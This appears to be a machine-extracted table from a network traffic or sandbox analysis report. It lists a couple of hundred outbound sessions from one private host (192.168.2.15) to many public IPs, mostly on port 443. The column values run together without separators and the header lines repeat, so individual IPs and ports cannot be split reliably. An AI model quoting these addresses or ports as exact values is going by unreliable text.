                                            21839192.168.2.154867454.223.33.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21840192.168.2.1553454198.204.76.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21841192.168.2.1539230184.7.255.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21842192.168.2.1547712148.205.230.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21843192.168.2.153467061.226.238.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21844192.168.2.1560130193.78.122.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21845192.168.2.154435887.29.251.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21846192.168.2.155810860.78.30.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21847192.168.2.1542656117.58.113.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21848192.168.2.156033452.233.173.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21849192.168.2.153356818.146.11.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21850192.168.2.154738040.107.138.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21851192.168.2.1555166210.53.41.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21852192.168.2.1539988201.59.177.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21853192.168.2.154168048.182.112.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21854192.168.2.1538296161.157.3.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21855192.168.2.1556372122.44.53.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21856192.168.2.1540426150.125.70.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21857192.168.2.1546204207.82.183.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21858192.168.2.1533466147.6.104.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21859192.168.2.1535244221.180.8.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21860192.168.2.1551812208.74.116.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21861192.168.2.154388227.36.132.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21862192.168.2.154175438.35.22.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21863192.168.2.1543776145.148.143.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21864192.168.2.1539170122.182.105.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21865192.168.2.1538738190.158.238.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21866192.168.2.155420443.232.165.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21867192.168.2.155043278.76.214.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21868192.168.2.153599844.152.155.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21869192.168.2.1546884145.222.27.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21870192.168.2.155970488.118.106.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21871192.168.2.153786839.215.85.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21872192.168.2.1548288126.167.171.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21873192.168.2.1541404118.26.39.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21874192.168.2.1543582108.175.128.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21875192.168.2.1560128120.45.197.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21876192.168.2.1539878189.43.70.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21877192.168.2.155575859.193.129.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21878192.168.2.1546874183.176.100.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21879192.168.2.1553358194.31.154.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21880192.168.2.1540406155.181.255.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21881192.168.2.1540920200.251.75.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21882192.168.2.156033620.243.47.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21883192.168.2.156059617.12.200.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21884192.168.2.153330486.93.66.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21885192.168.2.1553076136.58.84.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21886192.168.2.1550666117.140.212.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21887192.168.2.1555200185.96.163.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21888192.168.2.1543758181.99.223.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21889192.168.2.1553398141.184.207.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21890192.168.2.153580665.47.175.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21891192.168.2.1555000179.176.216.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21892192.168.2.1560302111.75.33.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21893192.168.2.1559950197.120.176.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21894192.168.2.1547766162.142.224.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21895192.168.2.1544092204.199.134.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21896192.168.2.1549028114.16.6.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21897192.168.2.153801074.149.80.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21898192.168.2.154481489.231.66.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21899192.168.2.1555758125.6.33.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21900192.168.2.1541688163.201.244.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21901192.168.2.155430476.55.250.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21902192.168.2.1543596113.26.99.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21903192.168.2.1543986107.59.164.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21904192.168.2.154054896.135.70.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21905192.168.2.1542650125.198.63.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21906192.168.2.156009419.240.192.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21907192.168.2.1546278145.9.40.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21908192.168.2.1535560137.67.223.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21909192.168.2.1544696141.165.40.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21910192.168.2.1539326115.129.210.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21911192.168.2.155627260.187.129.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21912192.168.2.1533214103.217.92.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21913192.168.2.153563879.30.158.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21914192.168.2.1556778163.143.231.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21915192.168.2.1534184131.181.109.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21916192.168.2.1546472146.116.49.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21917192.168.2.1548384130.97.41.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21918192.168.2.1558450112.70.81.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21919192.168.2.1552500160.11.232.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21920192.168.2.1556366192.157.3.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21921192.168.2.1547600212.213.219.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21922192.168.2.1551650176.136.241.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21923192.168.2.1536788160.145.148.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21924192.168.2.154927618.81.157.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21925192.168.2.1555726179.157.14.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21926192.168.2.154244461.113.94.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21927192.168.2.155350654.198.172.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21928192.168.2.155394489.111.131.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21929192.168.2.1544338132.25.178.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21930192.168.2.1545326105.130.160.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21931192.168.2.1548680197.85.220.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21932192.168.2.1545286175.90.146.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21933192.168.2.1542122194.86.15.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21934192.168.2.1536390148.186.210.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21935192.168.2.1536978187.33.43.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21936192.168.2.1560024174.130.131.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21937192.168.2.1545596142.147.48.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21938192.168.2.1545530193.50.135.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21939192.168.2.153911696.242.77.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21940192.168.2.153802674.229.140.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21941192.168.2.1552296120.241.27.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21942192.168.2.1543454179.26.170.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21943192.168.2.1557156173.82.236.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21944192.168.2.155580842.38.86.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21945192.168.2.1554634141.247.208.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21946192.168.2.155188053.249.107.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21947192.168.2.155112037.155.4.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21948192.168.2.1539182119.5.6.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21949192.168.2.1541606213.19.12.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21950192.168.2.154603475.53.45.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21951192.168.2.1540478178.253.61.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21952192.168.2.1559040128.138.137.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21953192.168.2.1534912150.119.89.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21954192.168.2.1555902194.191.153.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21955192.168.2.154780085.10.215.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21956192.168.2.1560386185.193.248.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21957192.168.2.153711041.92.5.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21958192.168.2.1556510208.151.69.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21959192.168.2.1550128208.246.244.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21960192.168.2.1542708130.161.160.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21961192.168.2.1557384121.43.122.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21962192.168.2.1556364182.109.163.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21963192.168.2.1551916150.124.177.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21964192.168.2.1550926129.24.123.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21965192.168.2.1543622191.188.205.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21966192.168.2.155150689.180.240.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21967192.168.2.1537736150.237.118.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21968192.168.2.155024037.216.143.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21969192.168.2.1534854200.97.243.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21970192.168.2.153906860.7.149.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21971192.168.2.1560918203.109.241.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21972192.168.2.1548230117.192.50.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21973192.168.2.155107024.90.126.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21974192.168.2.1539910124.105.155.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21975192.168.2.153885625.25.159.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21976192.168.2.1532952161.187.132.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21977192.168.2.1549210143.47.145.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21978192.168.2.1556642134.157.118.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21979192.168.2.1557182136.172.40.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21980192.168.2.154926864.223.105.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21981192.168.2.1558964126.9.131.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21982192.168.2.153435452.245.166.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21983192.168.2.153490448.104.192.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21984192.168.2.1552342141.119.214.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21985192.168.2.1542768160.175.161.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21986192.168.2.15544165.75.25.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21987192.168.2.154938620.188.17.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21988192.168.2.1546426170.134.16.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21989192.168.2.154535812.149.93.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21990192.168.2.1549826164.118.148.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21991192.168.2.153449066.37.196.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21992192.168.2.1546918142.193.13.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21993192.168.2.1558566179.147.124.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21994192.168.2.1551614116.20.245.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21995192.168.2.153986696.85.50.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21996192.168.2.156093892.226.189.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21997192.168.2.1549306100.23.237.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21998192.168.2.154191052.154.247.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21999192.168.2.1560898149.159.100.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22000192.168.2.1533844110.252.245.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22001192.168.2.155572868.252.11.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22002192.168.2.154548649.61.98.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22003192.168.2.1544272165.133.225.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22004192.168.2.1551796110.139.67.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22005192.168.2.1533110169.165.125.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22006192.168.2.1543342219.183.246.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22007192.168.2.155878423.135.133.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22008192.168.2.1556274105.85.97.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22009192.168.2.1539480223.21.9.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22010192.168.2.1545658140.35.61.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22011192.168.2.1541922109.164.45.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22012192.168.2.1539420209.97.159.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22013192.168.2.154718639.220.123.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22014192.168.2.153407294.243.12.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22015192.168.2.1556440177.79.244.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22016192.168.2.1557676125.174.153.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22017192.168.2.155078848.134.232.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22018192.168.2.1544428198.115.218.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22019192.168.2.1538566125.65.85.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22020192.168.2.1559196101.235.14.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22021192.168.2.1557710185.81.72.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22022192.168.2.1544702147.31.248.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22023192.168.2.1539788176.163.229.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22024192.168.2.1554296205.61.155.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22025192.168.2.153516847.243.181.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22026192.168.2.1536940139.29.170.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22027192.168.2.154885079.245.127.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22028192.168.2.154911231.166.88.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22029192.168.2.15472141.79.247.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22030192.168.2.1541608197.93.252.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22031192.168.2.1551862194.110.55.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22032192.168.2.1558790213.199.134.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22033192.168.2.1553272210.240.191.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22034192.168.2.153655414.246.228.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22035192.168.2.154868099.203.175.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22036192.168.2.1534582154.238.175.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22037192.168.2.155132013.167.85.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22038192.168.2.1549134172.194.46.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22039192.168.2.1546606187.243.67.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22040192.168.2.1536748222.244.185.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22041192.168.2.154633854.65.198.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22042192.168.2.1554342213.137.55.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22043192.168.2.1544354217.4.90.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22044192.168.2.1539616136.11.8.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22045192.168.2.155602899.217.137.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22046192.168.2.1539010195.143.237.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22047192.168.2.1560072195.71.188.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22048192.168.2.153554213.113.133.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22049192.168.2.1547802179.223.174.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22050192.168.2.1535532195.34.70.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22051192.168.2.154337440.242.224.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22052192.168.2.153376080.79.45.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22053192.168.2.1537150135.192.34.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22054192.168.2.1550968197.168.108.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22055192.168.2.1556810104.25.73.698080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22056192.168.2.1543068192.126.238.1328080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22057192.168.2.153368674.214.228.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22058192.168.2.154785219.151.235.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22059192.168.2.1544964176.190.57.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22060192.168.2.1544406176.132.58.197443
                                            TimestampBytes transferredDirectionData


